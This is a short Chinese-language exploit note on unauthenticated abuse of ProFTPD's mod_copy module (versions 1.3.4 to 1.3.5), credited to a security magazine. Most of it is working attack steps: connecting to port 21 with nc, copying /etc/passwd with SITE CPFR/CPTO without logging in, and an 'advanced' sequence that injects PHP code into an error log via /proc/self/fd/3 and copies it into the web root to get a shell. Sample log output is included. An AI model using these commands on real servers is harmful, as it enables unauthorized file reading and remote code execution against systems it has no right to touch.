proftpd的mod_copy模块未授权调用利用记录proftpd-1.3.4－－－proftpd-1.3.1.nc

文章来源自《安全参考》第30期，略有改动

影响版本：

proftpd-1.3.4－－－proftpd-1.3.5

1.执行命令

nc x.x.x.x 21

2.执行

site cpfr /etc/passwd

可以未授权状态复制文件

3.执行

site cpto /tmp/test

可将之前复制的/etc/passwd粘贴到/tmp/test

高级用法：

site cpfr /etc/passwd
site cpto <?php phpinfo(); ?> 
site cpfr /proc/self/fd/3
site cpto /var/www/test.php

原理：由于不存在<?php phpinfo(); ?>目录，会产生一个错误的记录到/proc/self/fd/3下面，内容大概如下

2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q 
(slon-P5Q.lan[192.168.3.193]): error rewinding scoreboard: Invalid argument 
2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q 
(slon-P5Q.lan[192.168.3.193]): FTP session opened.
2015-04-04 02:01:27,943 slon-P5Q proftpd[16255] slon-P5Q 
(slon-P5Q.lan[192.168.3.193]): error opening destination file '/<?php phpinfo(); ?>' for copying: Permission denied

将文件复制到web目录下即可实现getshell

\